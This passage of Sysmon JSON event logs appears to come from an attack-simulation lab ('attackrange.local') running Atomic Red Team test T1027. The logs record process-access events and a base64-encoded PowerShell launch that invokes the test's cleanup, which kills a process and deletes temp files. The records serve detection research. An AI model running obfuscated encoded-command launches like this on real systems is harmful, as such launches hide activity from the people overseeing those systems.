05:52:48.453","ProcessGuid":"{A837DB8D-0330-5F25-0000-001044A90A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_xjpdvizb.wx0.ps1","CreationUtcTime":"2020-08-01 05:52:48.453","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5573,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.500\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-001044A90A00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.500","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-001044A90A00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5574,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.500\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-001044A90A00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.500","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-001044A90A00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5575,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nProcessGuid: {A837DB8D-0330-5F25-0000-001013B80A00}\r\nProcessId: 1560\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"taskkill /f /im calculator.exe >nul 2>nul & rmdir /S /Q %%temp%%\\temp_T1027.zip >nul 2>nul & del /Q \"%%temp%%\\T1027.zip\" >nul 2>nul\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nParentProcessId: 3088\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","ProcessGuid":"{A837DB8D-0330-5F25-0000-001013B80A00}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"taskkill /f /im calculator.exe &gt;nul 2&gt;nul &amp; rmdir /S /Q %%temp%%\\temp_T1027.zip &gt;nul 2&gt;nul &amp; del /Q \"%%temp%%\\T1027.zip\" &gt;nul 2&gt;nul\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-032F-5F25-0000-0010BE790A00}","ParentProcessId":"3088","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5576,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4876\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-001013B80A00}\r\nTargetProcessId: 1560\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33638(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e334ac(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97eb5cd8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e2c094(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e5037(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e61366(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","SourceProcessId":"3088","SourceThreadId":"4876","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-001013B80A00}","TargetProcessId":"1560","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33638(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e334ac(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97eb5cd8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e2c094(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e5037(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e61366(wow64)","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5577,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-001013B80A00}\r\nTargetProcessId: 1560\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-001013B80A00}","TargetProcessId":"1560","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5578,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
